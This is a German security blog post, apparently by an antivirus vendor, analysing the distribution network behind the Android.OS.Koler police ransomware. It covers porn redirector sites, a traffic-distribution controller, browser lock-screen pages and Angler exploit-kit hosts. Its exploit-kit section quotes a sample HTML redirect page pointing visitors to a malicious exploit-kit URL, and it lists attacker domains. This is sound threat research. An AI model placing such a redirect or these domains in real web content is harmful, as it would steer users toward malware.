Ein Blick hinter das Verteilungsnetzwerk ‚Android.OS.Koler‘

Anfang Mai 2014 erwähnte ein IT-Sicherheitsexperte namens Kaffeine erstmals den Schädling Android.OS.Koler.a, ein Erpresser-Programm, das den Bildschirm eines infizierten Gerätes blockiert und ein Lösegeld in Höhe von 100 bis 300 Dollar für die Entsperrung des Gerätes fordert. Es verschlüsselt keine Dateien oder blockiert – außer dem Bildschirm – keine anderen Funktionen auf dem Gerät.

Die Malware zeigt eine lokalisierte Nachricht der Polizei an!

Der Schädling hat maßgeschneiderte Nachrichten für die folgenden Länder zu bieten:

Australien
Belgien
Bolivien
Dänemark
Deutschland
Ecuador
Finnland
Frankreich
Großbritannien
Irland
Italien
Kanada
Lettland
Mexiko
Neuseeland
Niederlande
Norwegen
Österreich
Polen
Portugal
Rumänien
Schweden
Schweiz
Slowakei
Slowenien
Spanien
Tschechische Republik
Türkei
Ungarn
USA

Seit dem 23..Juli ist der mobile Teil der Kampagne unterbrochen und die Command- und Control-Server begannen “Uninstall”-Anfragen an die Opfer zu versenden.

In diesem Blogpost geht es weniger um die mobile Anwendung selbst – einige Details werden wir am Ende des Beitrags beleuchten – als vielmehr um seine Verteilungsinfrastruktur. Ein ganzes Netzwerk von schädlichen Pornosites, verbunden mit einem Traffic-Richtungssystem, das das Opfer auf verschiedene Payloads umleitet und dabei nicht nur mobile Geräte, sondern einfach jeden Besucher angreift. Eingeschlossen sind Umleitungen auf Browser-basierte Erpresserprogramme – Ransomware – und auf etwas, das wir für ein “Angler”-Exploit-Kit-Verteilungsnetzwerk halten.

Das unten stehende Diagramm zeichnet ein umfassenderes Bild der hier verwendeten Infrastruktur.

Die wichtigsten Untersuchungsergebnisse lassen sich folgendermaßen zusammenfassen:

  • Verteilung:        TDS (Traffic Distribution System)
  • Hauptkontroller:        video-sartex.us (TDS Controller)
  • Schädliche Porno-Websites (Redirector):        49 Domains gefunden
  • Exploit-Kit Websites:        700+ URLs (200+ Domains)
  • Browser-basierte Bildschirm-Sperrdomains:        49 Domains gefunden
  • Mobile Infektionsdomain:        video-porno-gratuit.eu
  • Mobil C2:        policemobile.biz.
  • Traffic:        Fast 200.000 Besucher der mobilen Infektionsdomain
  • 80% der Besucher stammen aus den USA

Die Nutzung eines Porno-Netzwerks für diese „Polizei“-Erpressersoftware ist kein Zufall: Die Opfer fühlen sich viel eher schuldig, wenn sie derartigen Content besuchen, und sie bezahlen daher auch eher die angeblich von den Behörden geforderte Strafe. Dieser psychologische Faktor kann den feinen Unterschied ausmachen zwischen einer gescheiterten und einer erfolgreichen Kampagne.

Unter Berücksichtigung der schädlichen mobilen Anwendung haben wir verschiedene APKs mit demselben Verhalten aufgespürt. Einige von ihnen (die noch nicht über dieses schädliche Netzwerk verbreitet werden) haben interessante Namen, wie z.B. PronHub.com.Apk, whatsapp.apk oder updateflash.apk.

Das verleitet zu der Annahme, dass die Angreifer ihre Kampagne in nächster Zukunft ausweiten könnten.

Verteilung der mobilen Payload

Die mobile Infektion wird ausgelöst, wenn der Nutzer bestimmte Porno-Sites mit einem Android-Gerät besucht. Diese Sites sind Teil eines Verteilungsnetzwerks, das eigens für diese Kampagne erstellt wurde und die Opfer zu einer Landing-Page umleitet, die eine APK-Datei mit der Bezeichnung animalporn.apk enthält.

Alle diese Porno-Sites in der Kampagne leiten ihren Traffic auf denselben Server um: hxxp://video-porno-gratuit.eu. Diese Domain hostet die schädliche APK.

Sobald der Nutzer die Website besucht, leitet sie ihn automatisch auf die schädliche App um. Der User muss dann den Download und die Installation der Anwendung auf seinem Gerät bestätigen.

Wir konnten Statistiken abrufen, die die geografische Verteilung dieser schädlichen Websites zeigen:

Gemäß denselben Statistiken begann die Kampagne und erreichte den Höhepunkt ihrer Aktivität im April 2014.

Redirectors: Das schädliche Porno-Netzwerk

Bei den pornografischen Sites des Netzwerks handelt es sich nicht um kompromittierte Sites. Sie sehen alle gleich aus, haben dieselbe HTML-Infrastruktur und stellen nicht ihr eigenes Porno-Material bereit.

Wir konnten insgesamt 48 Domains in diesem Porno-Umleitungsnetzwerk identifizieren.

Fast alle in dieser Infrastruktur benutzten Websites wurden unter Verwendung derselben Schablone erstellt – in vielen Fällen waren es Mustervorlagen von den legitimen Sites Tubewizardpro und Webloader für die externen Ressourcen.

Der gesamte Content (meist Videos und Bilder) auf diesen Pornosites wird mit Hilfe von Webloader von externen Quellen geladen.

Grundsätzlich leiten alle Porno-Sites auf die „Kontroll“-Domain videosartex.us um

Videosartex.us führt dann einen Redircet durch, der auf dem Parameter in der URL, dem Referrer, dem User-Agent und der geografischen Position der IP des Besuchers basiert.

Gehört die IP zu einem der 30 betroffenen Länder und der User-Agent gehört zu einem Android-Gerät, so wird der Besucher auf die APK bei video-porno-gratuit.eu umgeleitet.

In anderen Fällen wird der Nutzer entweder auf eine Porno-Site in dem Netzwerk, einen Bildschirmblockierer oder ein Exploit-Kit umgeleitet. Die Angreifer verwenden das Keitaro TDS (Traffic Distribution System) zur Umleitung der Anwender.

Nicht-mobile Payloads

Während unserer Analyse stellten wir fest, dass einige Domains nicht mobilen Opfern Ransomware-bezogene Pop-Ups anzeigen. Diese zusätzlichen Server werden benutzt, wenn der Kontroller (videosartex) eine der zwei folgenden Bedingungen feststellt:

  • Die Anfrage enthält keinen User-Agent des Internet Explorer.
  • Die Anfrage stammt aus einem der 30 betroffenen Länder, enthält jedoch keinen Android-User-Agent.

In diesem Fall wird das Opfer auf irgendeine der Browser-Ransomware-Websites weitergeleitet, während genau derselbe Sperrbildschirm wie im Fall von mobilen Geräten auf dem Computer des Opfers angezeigt wird. Es gibt in diesem Fall keine Infektion, lediglich ein Pop-up, das eine Sperrbild-Schablone anzeigt.

Die folgenden Bilder sind Beispiele für die Header, die in den Ransomware-Pop-ups benutzt werden:



Exploit-Kits

Die bei dieser Kampagne verwendete Umleitungsinfrastruktur beinhaltete eine finale Überraschung – sie leitet die Besucher, die den Internet Explorer verwenden, auf Sites, die das Angler-Exploit-Kit hosten, das Exploits für Silverlight, Adobe Flash und Java enthält.

Hier ein Beispiel für eine solche Umleitung:

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL=’hxxp://antimicrobial.trentonmennonite.org:2980/hbwtfklh30.php/’">
<script type="text/javascript">window.location = "http://antimicrobial.trentonmennonite.org:2980/hbwtfklh30.php";</script>
</head>
<body>
The Document has moved <a href="hxxp://antimicrobial.trentonmennonite.org:2980/hbwtfklh30.php">here</a>
</body>
</html>

Wir entdeckten über 200 Domains, die zur Unterbringung dieses Exploit-Kits benutzt werden.

Während unserer Analyse war der Exploit-Code nicht voll funktionsfähig und lieferte keinerlei Payload.

Fazit

Ransomware für mobile Geräte tauchte in fast jeder Prognose für das Jahr 2014 auf. Wir haben es hier nicht mit den raffiniertesten Schadfamilien zu tun, wie etwa Cryptolocker für Windows. Die Erpresserprogramme sind recht einfach gestrickt, allerdings reichen sie aus, um dem Opfer Verdruss zu bereiten.

Am interessantesten ist das Verteilungsnetzwerk, das in dieser Kampagne zum Einsatz kommt. Dutzende von automatisch generierten Websites leiten den Traffic zu einem zentralen Netzknoten, wo die Nutzer wieder umgeleitet werden. In Abhängigkeit von verschiedenen Bedingungen kann der zweite Redirect auf eine schädliche Android-Anwendung, zu einer Browser-basierten Ransomware oder zu einer Website mit dem Angler Exploit Kit führen.

Unserer Meinung nach zeigt diese Infrastruktur sehr deutlich, wie gut organisiert und gefährlich solche Kampagnen sind, die aktuell hauptsächlich – aber nicht ausschließlich – Android-User attackieren. Die Angreifer können dank vollständiger Automatisierung schnell ähnliche Infrastrukturen aufbauen, indem sie die Payload ändern oder andere Nutzer angreifen. Die Kriminellen haben zudem eine Reihe von Wegen gefunden, ihr Einkommen aus den Attacken in einem echten Multi-Geräte-Schema in Bares zu verwandeln.

Ähnliche Beiträge

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.